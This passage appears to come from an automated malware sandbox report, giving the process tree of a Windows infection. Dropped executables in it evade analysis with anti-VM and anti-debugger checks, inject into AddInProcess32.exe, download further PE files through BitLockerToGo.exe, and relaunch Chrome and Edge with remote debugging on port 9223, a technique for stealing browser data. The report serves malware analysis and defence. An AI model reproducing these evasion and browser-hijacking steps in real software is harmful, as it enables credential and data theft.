                              • C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5844
                              • C:\Users\Admin\AppData\Local\Temp\1091557001\4e9f7cada4.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091557001\4e9f7cada4.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4924
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                  4⤵
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3024
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                    5⤵
                                      PID:5940
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1164
                                • C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4708
                                • C:\Users\Admin\AppData\Local\Temp\1091559001\5aeda337ba.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091559001\5aeda337ba.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:1432
                                • C:\Users\Admin\AppData\Local\Temp\1091560001\c7524aefbf.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091560001\c7524aefbf.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:4344
                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                    4⤵
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    PID:5364
                                • C:\Users\Admin\AppData\Local\Temp\1091561001\8891a969d4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091561001\8891a969d4.exe"
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  PID:6032
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                    4⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:2676
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffabb8dcc40,0x7ffabb8dcc4c,0x7ffabb8dcc58
                                      5⤵
                                        PID:4464
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1908 /prefetch:2
                                        5⤵
                                          PID:5960
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2208,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:3
                                          5⤵
                                            PID:1548
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
                                            5⤵
                                              PID:4868
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:5740
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:4516
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:4484
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:8
                                              5⤵
                                                PID:5172
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4308 /prefetch:8
                                                5⤵
                                                  PID:5948
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,16326549420896095412,17004838135764924037,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
                                                  5⤵
                                                    PID:116
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  PID:1220
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabb8e46f8,0x7ffabb8e4708,0x7ffabb8e4718
                                                    5⤵
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:5480
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
                                                    5⤵
                                                      PID:4248
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
                                                      5⤵
                                                        PID:5772
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
                                                        5⤵
                                                          PID:5736
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:5744
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:4820
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
                                                          5⤵
                                                            PID:5632
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
                                                            5⤵
                                                              PID:1860
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2572 /prefetch:2
                                                              5⤵
                                                                PID:1336
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2272 /prefetch:2
                                                                5⤵
                                                                  PID:5180
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2260 /prefetch:2
                                                                  5⤵
                                                                    PID:5672
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:5308
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:4628
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2320 /prefetch:2
                                                                    5⤵
                                                                      PID:5632
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2308 /prefetch:2
                                                                      5⤵
                                                                        PID:5148
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,306800296161568294,9569935859418806766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2328 /prefetch:2
                                                                        5⤵
                                                                          PID:4476
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        4⤵
                                                                        • Uses browser remote debugging
                                                                        • Enumerates system info in registry
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        PID:3232
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabb8e46f8,0x7ffabb8e4708,0x7ffabb8e4718
                                                                          5⤵
                                                                          • Blocklisted process makes network request
                                                                          • Checks processor information in registry
                                                                          • Enumerates system info in registry
                                                                          PID:5840
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
                                                                          5⤵
                                                                            PID:5684
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
                                                                            5⤵
                                                                              PID:3156
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
                                                                              5⤵
                                                                                PID:456
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:116
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4212
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,1538065256890582644,14990836941889516562,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
                                                                                5⤵
                                                                                  PID:1336
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                4⤵
                                                                                • Uses browser remote debugging
                                                                                • Enumerates system info in registry
                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                PID:1768
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad7d846f8,0x7ffad7d84708,0x7ffad7d84718
                                                                                  5⤵
                                                                                  • Checks processor information in registry
                                                                                  • Enumerates system info in registry
                                                                                  PID:5400
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
                                                                                  5⤵
                                                                                    PID:5908
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                                                                                    5⤵
                                                                                      PID:1248
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
                                                                                      5⤵
                                                                                        PID:5016
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,17044531682380679113,10741572317609847880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
                                                                                        5⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:6376
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
